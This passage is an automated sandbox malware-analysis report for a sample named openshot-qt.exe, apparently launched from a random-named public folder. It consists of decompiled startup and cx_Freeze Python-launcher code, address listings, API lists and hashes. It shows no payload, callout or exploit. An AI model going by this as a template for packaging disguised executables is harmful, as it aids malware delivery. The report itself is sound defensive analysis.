                                                                    					}
                                                                    					goto L52;
                                                                    				}
                                                                    			}














































                                                                    0x003011b3
                                                                    0x003011b3
                                                                    0x00000000
                                                                    0x003011b8
                                                                    0x003011ba
                                                                    0x003013f8
                                                                    0x00301400
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x003011c0
                                                                    0x003011c7
                                                                    0x003011c9
                                                                    0x003011cc
                                                                    0x003011cc
                                                                    0x003011ce
                                                                    0x003011d8
                                                                    0x00000000
                                                                    0x003011da
                                                                    0x003011df
                                                                    0x003011e4
                                                                    0x00301406
                                                                    0x00301406
                                                                    0x0030140d
                                                                    0x0030141a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x003011ea
                                                                    0x003011ea
                                                                    0x003011f1
                                                                    0x00301478
                                                                    0x00301480
                                                                    0x00301487
                                                                    0x00301491
                                                                    0x003011f7
                                                                    0x003011f7
                                                                    0x003011f7
                                                                    0x00301209
                                                                    0x00301420
                                                                    0x00301420
                                                                    0x00301428
                                                                    0x0030142f
                                                                    0x00301434
                                                                    0x00301440
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0030120f
                                                                    0x0030120f
                                                                    0x00301211
                                                                    0x00301446
                                                                    0x00301446
                                                                    0x00301446
                                                                    0x00301446
                                                                    0x00301446
                                                                    0x00301211
                                                                    0x00301209
                                                                    0x003011e4
                                                                    0x003011d8
                                                                    0x00301217
                                                                    0x00301217
                                                                    0x0030121e
                                                                    0x00301220
                                                                    0x00301228
                                                                    0x00301230
                                                                    0x00301237
                                                                    0x00301239
                                                                    0x00301239
                                                                    0x0030123c
                                                                    0x00301241
                                                                    0x00301248
                                                                    0x0030124e
                                                                    0x00301251
                                                                    0x00301256
                                                                    0x00301262
                                                                    0x00301267
                                                                    0x00301271
                                                                    0x00301276
                                                                    0x00301278
                                                                    0x0030127c
                                                                    0x00301292
                                                                    0x00301292
                                                                    0x00301299
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0030129b
                                                                    0x003012a4
                                                                    0x0030128f
                                                                    0x0030128f
                                                                    0x00301292
                                                                    0x00301299
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x003012c8
                                                                    0x003012c8
                                                                    0x00000000
                                                                    0x00301280
                                                                    0x00301283
                                                                    0x0030128a
                                                                    0x00000000
                                                                    0x0030128a
                                                                    0x003012b0
                                                                    0x003012b8
                                                                    0x003012b8
                                                                    0x003012bc
                                                                    0x003012c2
                                                                    0x003012b8
                                                                    0x00000000
                                                                    0x003012b0
                                                                    0x00000000
                                                                    0x0030127e
                                                                    0x003012cd
                                                                    0x003012d5
                                                                    0x003012d7
                                                                    0x003012e0
                                                                    0x003013ea
                                                                    0x003013ea
                                                                    0x003012e6
                                                                    0x003012e6
                                                                    0x003012eb
                                                                    0x003012f1
                                                                    0x003012f8
                                                                    0x003012fb
                                                                    0x00301300
                                                                    0x00301306
                                                                    0x0030130b
                                                                    0x0030149b
                                                                    0x00301311
                                                                    0x00301311
                                                                    0x00301313
                                                                    0x00301313
                                                                    0x00301316
                                                                    0x00301318
                                                                    0x0030131d
                                                                    0x00301320
                                                                    0x00301320
                                                                    0x00301326
                                                                    0x003013e0
                                                                    0x0030132c
                                                                    0x0030132c
                                                                    0x00301338
                                                                    0x00301338
                                                                    0x0030133b
                                                                    0x00301343
                                                                    0x00301343
                                                                    0x00301346
                                                                    0x00301349
                                                                    0x0030134c
                                                                    0x0030134f
                                                                    0x00301354
                                                                    0x00301357
                                                                    0x0030135a
                                                                    0x0030135e
                                                                    0x00301362
                                                                    0x00301365
                                                                    0x0030136a
                                                                    0x00301372
                                                                    0x00301372
                                                                    0x00301375
                                                                    0x0030137e
                                                                    0x00301383
                                                                    0x00301388
                                                                    0x00301393
                                                                    0x00301395
                                                                    0x00301399
                                                                    0x0030139e
                                                                    0x003013a2
                                                                    0x003013a7
                                                                    0x003013aa
                                                                    0x003013af
                                                                    0x003013b5
                                                                    0x003013bc
                                                                    0x003014a3
                                                                    0x003014a6
                                                                    0x003014b0
                                                                    0x00301170
                                                                    0x00301174
                                                                    0x00301179
                                                                    0x0030117c
                                                                    0x0030117d
                                                                    0x0030117f
                                                                    0x00301180
                                                                    0x00301181
                                                                    0x00301184
                                                                    0x00301187
                                                                    0x00301196
                                                                    0x00301196
                                                                    0x0030119a
                                                                    0x00301451
                                                                    0x00301454
                                                                    0x0030145a
                                                                    0x0030145a
                                                                    0x003011a6
                                                                    0x003011ac
                                                                    0x00000000
                                                                    0x003011af
                                                                    0x003013c2
                                                                    0x003013ca
                                                                    0x00301462
                                                                    0x00301467
                                                                    0x00301477
                                                                    0x003013d0
                                                                    0x003013db
                                                                    0x003013db
                                                                    0x00000000
                                                                    0x003013ca

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.527664682.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                    • Associated: 00000020.00000002.527632088.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527726269.000000000030A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.000000000030E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.0000000000310000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527814222.0000000000313000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.528082356.0000000000358000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_300000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID: malloc$ExceptionFilterSleepUnhandled__p__wcmdln_amsg_exit_inittermmemcpy
                                                                    • String ID: 0"0$x0
                                                                    • API String ID: 527270645-177203793
                                                                    • Opcode ID: 64b00a99ff51b3f3ba4e0621a0241c5a7a49c2aedc2198bcc9d8a665ff587798
                                                                    • Instruction ID: a912fa3c2c46e743738e6feac6425291443dfc6e96fa4d9def5a9135bea0ae55
                                                                    • Opcode Fuzzy Hash: 64b00a99ff51b3f3ba4e0621a0241c5a7a49c2aedc2198bcc9d8a665ff587798
                                                                    • Instruction Fuzzy Hash: 6A417E78A063018FDB27DF69D8A475EB7F4FB48300F15892EE5858B3A1D7B0A845CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 144 301170-30119a 146 3011a0-3011b1 144->146 147 301451-30145a GetStartupInfoW 144->147 148 3011cc-3011d8 146->148 149 301462-301477 _cexit 147->149 150 3011b8-3011ba 148->150 151 3011da-3011e4 148->151 152 3011c0-3011c9 Sleep 150->152 153 3013f3-301400 150->153 154 301406-30141a _amsg_exit 151->154 155 3011ea-3011f1 151->155 152->148 153->154 153->155 156 301420-301440 _initterm 154->156 157 30120f-301211 154->157 158 3011f7-301209 155->158 159 301478-301491 _initterm 155->159 160 301446-30144c 156->160 161 301217-30121e 156->161 157->160 157->161 158->156 158->157 162 30149b 159->162 160->161 163 301220-301239 161->163 164 30123c-30127c call 302540 SetUnhandledExceptionFilter call 3087c0 call 302370 __p__wcmdln 161->164 167 3014a3-3014af exit 162->167 163->164 173 301292-301299 164->173 174 30127e 164->174 176 301280-301283 173->176 177 30129b-3012a7 173->177 175 3012cd-3012d5 174->175 180 3012d7-3012e0 175->180 181 3012eb-30130b malloc 175->181 178 301285-301288 176->178 179 3012a9-3012b0 176->179 182 30128f 177->182 178->179 183 30128a 178->183 186 3012b2 179->186 187 3012c8 179->187 184 3012e6 180->184 185 3013ea 180->185 181->162 188 301311-30131d 181->188 182->173 183->182 184->181 185->153 189 3012b8-3012c6 186->189 187->175 190 301320-301326 188->190 189->187 189->189 191 3013e0-3013e5 190->191 192 30132c-301331 190->192 193 301346-30136d malloc memcpy 191->193 194 301338-301341 192->194 193->190 196 30136f-3013bc call 302170 call 3021a0 193->196 194->194 195 301343 194->195 195->193 196->167 201 3013c2-3013ca 196->201 201->149 202 3013d0-3013db 201->202
                                                                    C-Code - Quality: 31%
                                                                    			E00301170(char _a4) {
                                                                    				void* _v20;
                                                                    				signed short _v48;
                                                                    				signed char _v52;
                                                                    				char _v100;
                                                                    				intOrPtr _v112;
                                                                    				void* _v116;
                                                                    				intOrPtr _v120;
                                                                    				void* _v136;
                                                                    				signed int _v140;
                                                                    				void* _v144;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				void* __ebp;
                                                                    				intOrPtr* _t49;
                                                                    				_Unknown_base(*)()* _t51;
                                                                    				signed short** _t53;
                                                                    				signed short* _t54;
                                                                    				void* _t55;
                                                                    				intOrPtr* _t56;
                                                                    				signed int _t59;
                                                                    				void* _t60;
                                                                    				signed int _t61;
                                                                    				void* _t62;
                                                                    				void* _t63;
                                                                    				intOrPtr _t64;
                                                                    				void* _t66;
                                                                    				signed int _t68;
                                                                    				signed int _t70;
                                                                    				signed int _t75;
                                                                    				signed int _t77;
                                                                    				void* _t80;
                                                                    				char* _t83;
                                                                    				signed int _t86;
                                                                    				void* _t87;
                                                                    				intOrPtr _t88;
                                                                    				void _t91;
                                                                    				struct _STARTUPINFOW* _t94;
                                                                    				signed int _t95;
                                                                    				signed int _t98;
                                                                    				intOrPtr _t103;
                                                                    				void* _t106;
                                                                    				signed int _t107;
                                                                    				void* _t110;
                                                                    				void* _t111;
                                                                    				void* _t114;
                                                                    				signed int _t119;
                                                                    				signed int _t120;
                                                                    				void* _t122;
                                                                    				void** _t123;
                                                                    
                                                                    				L0:
                                                                    				while(1) {
                                                                    					L0:
                                                                    					_t83 =  &_a4;
                                                                    					_t120 = _t119 & 0xfffffff0;
                                                                    					_push( *((intOrPtr*)(_t83 - 4)));
                                                                    					_t94 =  &_v100;
                                                                    					_push(_t83);
                                                                    					memset(_t94, 0, 0x11 << 2);
                                                                    					_t122 = _t120 - 0x78 + 0xc;
                                                                    					if( *0x30f0c8 != 0) {
                                                                    						GetStartupInfoW(_t94);
                                                                    						_t122 = _t122 - 4;
                                                                    					}
                                                                    					_t110 = Sleep;
                                                                    					_t103 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                    					while(1) {
                                                                    						L5:
                                                                    						asm("lock cmpxchg [0x30f0a4], edi");
                                                                    						if(0 == 0) {
                                                                    							break;
                                                                    						}
                                                                    						L3:
                                                                    						if(_t103 == 0) {
                                                                    							L41:
                                                                    							_t75 = 1;
                                                                    							if( *0x30f0a8 != 1) {
                                                                    								L7:
                                                                    								if( *0x30f0a8 == 0) {
                                                                    									_v140 = 0x311018;
                                                                    									_v144 = 0x31100c;
                                                                    									 *0x30f0a8 = 1;
                                                                    									L003083A8();
                                                                    								} else {
                                                                    									 *0x30e010 = 1;
                                                                    								}
                                                                    								if( *0x30f0a8 == 1) {
                                                                    									goto L43;
                                                                    								} else {
                                                                    									goto L10;
                                                                    								}
                                                                    							} else {
                                                                    								L42:
                                                                    								_v144 = 0x1f;
                                                                    								L003083C0();
                                                                    								if( *0x30f0a8 != 1) {
                                                                    									L10:
                                                                    									if(_t75 == 0) {
                                                                    										goto L44;
                                                                    									}
                                                                    								} else {
                                                                    									L43:
                                                                    									_v140 = 0x311008;
                                                                    									_v144 = 0x311000; // executed
                                                                    									L003083A8(); // executed
                                                                    									 *0x30f0a8 = 2;
                                                                    									if(_t75 == 0) {
                                                                    										L44:
                                                                    										_t37 = _t75;
                                                                    										_t75 =  *0x30f0a4;
                                                                    										 *0x30f0a4 = _t37;
                                                                    									}
                                                                    								}
                                                                    							}
                                                                    							L51:
                                                                    						} else {
                                                                    							L4:
                                                                    							Sleep(0x3e8);
                                                                    							_t122 = _t122 - 4;
                                                                    							continue;
                                                                    						}
                                                                    						L11:
                                                                    						_t49 = "0\"0"; // 0x302230
                                                                    						if(_t49 != 0) {
                                                                    							_v136 = 0;
                                                                    							_v140 = 2;
                                                                    							_v144 = 0;
                                                                    							_t49 =  *_t49();
                                                                    							_t122 = _t122 - 0xc;
                                                                    						}
                                                                    						E00302540(_t49, _t75, _t103, _t110);
                                                                    						_v144 = E00302830; // executed
                                                                    						_t51 = SetUnhandledExceptionFilter(??); // executed
                                                                    						_t123 = _t122 - 4;
                                                                    						 *0x30f0e0 = _t51;
                                                                    						 *_t123 = 0x301000;
                                                                    						_t53 = E00302370(E003087C0());
                                                                    						 *0x30e008 = 0x300000;
                                                                    						L003083E0();
                                                                    						_t86 = 0;
                                                                    						_t54 =  *_t53;
                                                                    						if(_t54 != 0) {
                                                                    							while(1) {
                                                                    								L19:
                                                                    								_t95 =  *_t54 & 0x0000ffff;
                                                                    								if(_t95 <= 0x20) {
                                                                    									goto L15;
                                                                    								}
                                                                    								L20:
                                                                    								_t86 =  ==  ? _t86 ^ 0x00000001 : _t86;
                                                                    								L18:
                                                                    								_t54 =  &(_t54[1]);
                                                                    								L19:
                                                                    								_t95 =  *_t54 & 0x0000ffff;
                                                                    								if(_t95 <= 0x20) {
                                                                    									goto L15;
                                                                    								}
                                                                    								L24:
                                                                    								 *0x30e004 = _t54;
                                                                    								goto L25;
                                                                    								L15:
                                                                    								if(_t95 != 0 && (_t86 & 0x00000001) != 0) {
                                                                    									L17:
                                                                    									_t86 = 1;
                                                                    									goto L18;
                                                                    								}
                                                                    								L21:
                                                                    								if(_t95 - 1 <= 0x1f) {
                                                                    									L22:
                                                                    									do {
                                                                    										L23:
                                                                    										_t107 = _t54[1] & 0x0000ffff;
                                                                    										_t54 =  &(_t54[1]);
                                                                    									} while (_t107 - 1 <= 0x1f);
                                                                    								}
                                                                    								goto L24;
                                                                    							}
                                                                    						}
                                                                    						L25:
                                                                    						if( *0x30f0c8 != 0) {
                                                                    							_t70 = 0xa;
                                                                    							if((_v52 & 0x00000001) != 0) {
                                                                    								_t70 = _v48 & 0x0000ffff;
                                                                    							}
                                                                    							 *0x309000 = _t70;
                                                                    						}
                                                                    						_t77 =  *0x30e024; // 0x1
                                                                    						_t111 = 4 + _t77 * 4;
                                                                    						 *_t123 = _t111;
                                                                    						_t55 = malloc(??);
                                                                    						_t87 =  *0x30e020; // 0xef0e78
                                                                    						_v116 = _t55;
                                                                    						if(_t77 <= 0) {
                                                                    							L48:
                                                                    							_t56 = _v116;
                                                                    						} else {
                                                                    							L29:
                                                                    							_t80 = _t55;
                                                                    							_t16 = _t111 - 4; // 0x74cb648c
                                                                    							_t64 = _t16;
                                                                    							_t114 = _t87;
                                                                    							_v120 = _t64;
                                                                    							_v112 = _t64 + _t87;
                                                                    							do {
                                                                    								L30:
                                                                    								_t91 =  *_t114;
                                                                    								if( *_t91 == 0) {
                                                                    									L39:
                                                                    									_t106 = 2;
                                                                    								} else {
                                                                    									L31:
                                                                    									_t68 = 1;
                                                                    									do {
                                                                    										L32:
                                                                    										_t68 = _t68 + 1;
                                                                    									} while ( *((short*)(_t91 + _t68 * 2 - 2)) != 0);
                                                                    									_t106 = _t68 + _t68;
                                                                    								}
                                                                    								L34:
                                                                    								 *_t123 = _t106;
                                                                    								_t114 = _t114 + 4;
                                                                    								_t80 = _t80 + 4;
                                                                    								_t66 = malloc(??);
                                                                    								 *(_t80 - 4) = _t66;
                                                                    								_t24 = _t114 - 4; // 0xadfb3c97
                                                                    								_v140 = _t106;
                                                                    								_v144 =  *_t24;
                                                                    								 *_t123 = _t66;
                                                                    								memcpy(??, ??, ??);
                                                                    							} while (_v112 != _t114);
                                                                    							_t56 = _v120 + _v116;
                                                                    						}
                                                                    						L36:
                                                                    						 *_t56 = 0;
                                                                    						 *0x30e020 = _v116;
                                                                    						E00302170();
                                                                    						_t59 =  *0x30e01c; // 0xef3078
                                                                    						 *__imp____winitenv = _t59;
                                                                    						_v140 = _t59;
                                                                    						_t60 =  *0x30e020; // 0xef0e78
                                                                    						_v144 = _t60;
                                                                    						_t61 =  *0x30e024; // 0x1
                                                                    						 *_t123 = _t61;
                                                                    						_t62 = E003021A0();
                                                                    						_t88 =  *0x30e014; // 0x0
                                                                    						 *0x30e018 = _t62;
                                                                    						if(_t88 == 0) {
                                                                    							L49:
                                                                    							 *_t123 = _t62;
                                                                    							exit(??);
                                                                    							L50:
                                                                    							 *0x30f0c8 = 1;
                                                                    							goto L0;
                                                                    						}
                                                                    						L37:
                                                                    						_t98 =  *0x30e010; // 0x0
                                                                    						if(_t98 == 0) {
                                                                    							L003083B8();
                                                                    							_t63 =  *0x30e018; // 0x0
                                                                    							return _t63;
                                                                    						} else {
                                                                    							return _t62;
                                                                    						}
                                                                    						goto L51;
                                                                    					}
                                                                    					L6:
                                                                    					_t75 = 0;
                                                                    					if( *0x30f0a8 == 1) {
                                                                    						goto L42;
                                                                    					} else {
                                                                    						goto L7;
                                                                    					}
                                                                    					goto L11;
                                                                    				}
                                                                    			}





















































                                                                    0x00301170
                                                                    0x00301170
                                                                    0x00301170
                                                                    0x00301170
                                                                    0x00301174
                                                                    0x00301179
                                                                    0x00301181
                                                                    0x00301187
                                                                    0x00301196
                                                                    0x00301196
                                                                    0x0030119a
                                                                    0x00301454
                                                                    0x0030145a
                                                                    0x0030145a
                                                                    0x003011a6
                                                                    0x003011ac
                                                                    0x003011cc
                                                                    0x003011cc
                                                                    0x003011ce
                                                                    0x003011d8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x003011b8
                                                                    0x003011ba
                                                                    0x003013f3
                                                                    0x003013f8
                                                                    0x00301400
                                                                    0x003011ea
                                                                    0x003011f1
                                                                    0x00301478
                                                                    0x00301480
                                                                    0x00301487
                                                                    0x00301491
                                                                    0x003011f7
                                                                    0x003011f7
                                                                    0x003011f7
                                                                    0x00301209
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00301406
                                                                    0x00301406
                                                                    0x00301406
                                                                    0x0030140d
                                                                    0x0030141a
                                                                    0x0030120f
                                                                    0x00301211
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00301420
                                                                    0x00301420
                                                                    0x00301420
                                                                    0x00301428
                                                                    0x0030142f
                                                                    0x00301434
                                                                    0x00301440
                                                                    0x00301446
                                                                    0x00301446
                                                                    0x00301446
                                                                    0x00301446
                                                                    0x00301446
                                                                    0x00301440
                                                                    0x0030141a
                                                                    0x00000000
                                                                    0x003011c0
                                                                    0x003011c0
                                                                    0x003011c7
                                                                    0x003011c9
                                                                    0x00000000
                                                                    0x003011c9
                                                                    0x00301217
                                                                    0x00301217
                                                                    0x0030121e
                                                                    0x00301220
                                                                    0x00301228
                                                                    0x00301230
                                                                    0x00301237
                                                                    0x00301239
                                                                    0x00301239
                                                                    0x0030123c
                                                                    0x00301241
                                                                    0x00301248
                                                                    0x0030124e
                                                                    0x00301251
                                                                    0x00301256
                                                                    0x00301262
                                                                    0x00301267
                                                                    0x00301271
                                                                    0x00301276
                                                                    0x00301278
                                                                    0x0030127c
                                                                    0x00301292
                                                                    0x00301292
                                                                    0x00301292
                                                                    0x00301299
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0030129b
                                                                    0x003012a4
                                                                    0x0030128f
                                                                    0x0030128f
                                                                    0x00301292
                                                                    0x00301292
                                                                    0x00301299
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x003012c8
                                                                    0x003012c8
                                                                    0x00000000
                                                                    0x00301280
                                                                    0x00301283
                                                                    0x0030128a
                                                                    0x0030128a
                                                                    0x00000000
                                                                    0x0030128a
                                                                    0x003012a9
                                                                    0x003012b0
                                                                    0x00000000
                                                                    0x003012b8
                                                                    0x003012b8
                                                                    0x003012b8
                                                                    0x003012bc
                                                                    0x003012c2
                                                                    0x003012b8
                                                                    0x00000000
                                                                    0x003012b0
                                                                    0x00301292
                                                                    0x003012cd
                                                                    0x003012d5
                                                                    0x003012d7
                                                                    0x003012e0
                                                                    0x003013ea
                                                                    0x003013ea
                                                                    0x003012e6
                                                                    0x003012e6
                                                                    0x003012eb
                                                                    0x003012f1
                                                                    0x003012f8
                                                                    0x003012fb
                                                                    0x00301300
                                                                    0x00301306
                                                                    0x0030130b
                                                                    0x0030149b
                                                                    0x0030149b
                                                                    0x00301311
                                                                    0x00301311
                                                                    0x00301311
                                                                    0x00301313
                                                                    0x00301313
                                                                    0x00301316
                                                                    0x00301318
                                                                    0x0030131d
                                                                    0x00301320
                                                                    0x00301320
                                                                    0x00301320
                                                                    0x00301326
                                                                    0x003013e0
                                                                    0x003013e0
                                                                    0x0030132c
                                                                    0x0030132c
                                                                    0x0030132c
                                                                    0x00301338
                                                                    0x00301338
                                                                    0x00301338
                                                                    0x0030133b
                                                                    0x00301343
                                                                    0x00301343
                                                                    0x00301346
                                                                    0x00301346
                                                                    0x00301349
                                                                    0x0030134c
                                                                    0x0030134f
                                                                    0x00301354
                                                                    0x00301357
                                                                    0x0030135a
                                                                    0x0030135e
                                                                    0x00301362
                                                                    0x00301365
                                                                    0x0030136a
                                                                    0x00301372
                                                                    0x00301372
                                                                    0x00301375
                                                                    0x00301375
                                                                    0x0030137e
                                                                    0x00301383
                                                                    0x00301388
                                                                    0x00301393
                                                                    0x00301395
                                                                    0x00301399
                                                                    0x0030139e
                                                                    0x003013a2
                                                                    0x003013a7
                                                                    0x003013aa
                                                                    0x003013af
                                                                    0x003013b5
                                                                    0x003013bc
                                                                    0x003014a3
                                                                    0x003014a3
                                                                    0x003014a6
                                                                    0x003014b0
                                                                    0x003014b0
                                                                    0x00000000
                                                                    0x003014b0
                                                                    0x003013c2
                                                                    0x003013c2
                                                                    0x003013ca
                                                                    0x00301462
                                                                    0x00301467
                                                                    0x00301477
                                                                    0x003013d0
                                                                    0x003013db
                                                                    0x003013db
                                                                    0x00000000
                                                                    0x003013ca
                                                                    0x003011da
                                                                    0x003011df
                                                                    0x003011e4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x003011e4

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.527664682.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                    • Associated: 00000020.00000002.527632088.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527726269.000000000030A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.000000000030E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.0000000000310000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527814222.0000000000313000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.528082356.0000000000358000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_300000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__wcmdlnmemcpy
                                                                    • String ID: 0"0$x0
                                                                    • API String ID: 1204267290-177203793
                                                                    • Opcode ID: 4567c57a978852d836e64415a155941e8355f3a08dd5609e42c5f7dc982cb094
                                                                    • Instruction ID: 94eb46f3870a6dd48166a6b6be6392e9475f560f0216d6bc20e261edcb0832ea
                                                                    • Opcode Fuzzy Hash: 4567c57a978852d836e64415a155941e8355f3a08dd5609e42c5f7dc982cb094
                                                                    • Instruction Fuzzy Hash: 47518175A063008FDB27DF69D8A475AB7F8FB48300F15892EE9458B3A1D7B0A845CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.530304518.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_6fd0000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7750aaa174a00331e4674fa0d19939b0dadf61ebd2d9e820cfd9a116a1e7aaf8
                                                                    • Instruction ID: b878394657fd3ae1b3bd2fec6691e61147d21be556cab270921b468f1a2db6ba
                                                                    • Opcode Fuzzy Hash: 7750aaa174a00331e4674fa0d19939b0dadf61ebd2d9e820cfd9a116a1e7aaf8
                                                                    • Instruction Fuzzy Hash: C691A035E0031A8FCB45DFA4D8549DEFBBBFF89300F248215E516AB2A5DB70A945CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.530304518.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_6fd0000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 55f4afd9d7bff0928714bacfb63476792b618c2deae7d983e22a2e11f0d46810
                                                                    • Instruction ID: b7f9572c5468683f7cccf26afb409eed302216c8b93364930506713760119a23
                                                                    • Opcode Fuzzy Hash: 55f4afd9d7bff0928714bacfb63476792b618c2deae7d983e22a2e11f0d46810
                                                                    • Instruction Fuzzy Hash: 07818235E003198FCB05DFA1DD549DEB7BBFF89310F248215E515AB2A4EB70A945CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(?,?,?,?,?,?,?,-00000004,00EF0E74,00000002,?,003021CA), ref: 00301DAC
                                                                    • PathRemoveFileSpecW.SHLWAPI ref: 00301DDB
                                                                    • wcslen.MSVCRT ref: 00301DEB
                                                                    • wcslen.MSVCRT ref: 00301DF9
                                                                    • PyMem_Malloc.LIBPYTHON3.8 ref: 00301E08
                                                                    • Py_SetProgramName.LIBPYTHON3.8(?,?,?,?,?,?,?,?,?,?,?,?,?,-00000004,00EF0E74,00000002), ref: 00301E63
                                                                    • Py_SetPath.LIBPYTHON3.8(?,?,?,?,?,?,?,?,?,?,?,?,?,-00000004,00EF0E74,00000002), ref: 00301E6B
                                                                    • Py_Initialize.LIBPYTHON3.8(?,?,?,?,?,?,?,?,?,?,?,?,?,-00000004,00EF0E74,00000002), ref: 00301E70
                                                                    • PySys_SetArgv.LIBPYTHON3.8(?,?,?,?,?,?,?,?,?,?,?,?,?,-00000004,00EF0E74,00000002), ref: 00301E7C
                                                                    • PyUnicode_FromString.LIBPYTHON3.8(?,?,?,?,?,?,?,?,?,?,?,?,?,-00000004,00EF0E74,00000002), ref: 00301E88
                                                                    • PyImport_Import.LIBPYTHON3.8(?,?,?,?,?,?,?,?,?,?,?,?,?,-00000004,00EF0E74,00000002), ref: 00301E9A
                                                                    • PyObject_GetAttrString.LIBPYTHON3.8(?,?,?,?,?,?,?,?,?,?,?,?,?,-00000004,00EF0E74,00000002), ref: 00301EB4
                                                                    • PyObject_CallObject.LIBPYTHON3.8(?,?,?,?,?,?,?,?,?,?,?,?,?,-00000004,00EF0E74,00000002), ref: 00301ECE
                                                                    • MessageBoxA.USER32 ref: 00301F24
                                                                    • Py_Finalize.LIBPYTHON3.8 ref: 00301F2D
                                                                    • Py_Finalize.LIBPYTHON3.8 ref: 00301F32
                                                                    • _Py_Dealloc.LIBPYTHON3.8(?,?,?,?,?,?,?,?,?,?,?,?,?,-00000004,00EF0E74,00000002), ref: 00301F6B
                                                                    • PyErr_ExceptionMatches.LIBPYTHON3.8(?,?,?,?,?,?,?,?,?,?,?,?,?,-00000004,00EF0E74,00000002), ref: 00301F92
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.527664682.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                    • Associated: 00000020.00000002.527632088.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527726269.000000000030A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.000000000030E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.0000000000310000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527814222.0000000000313000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.528082356.0000000000358000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_300000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID: FileFinalize.Object_String.wcslen$Argv.AttrCallDealloc.Err_ExceptionFromImport.Import_Initialize.Malloc.Matches.Mem_MessageModuleNameName.Object.PathPath.ProgramRemoveSpecSys_Unicode_
                                                                    • String ID: %ls\lib\library.zip;%ls\lib$C:\Users\Public\Documents\tqVXfZhGNW$C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exe$Cannot create string for startup module name!$Out of memory creating sys.path!$Unable to get executable name!$__startup__$cx_Freeze Fatal Error$run
                                                                    • API String ID: 205463763-3069330846
                                                                    • Opcode ID: bbbdaa4c200cd7a63ee6fac5b3b3c54418d8fd35c1c54f1675b0d931f3f9f458
                                                                    • Instruction ID: dbb845ce293c6f33d0d049a4d84c57a2f9ead389a49d8a3369345ea41692949e
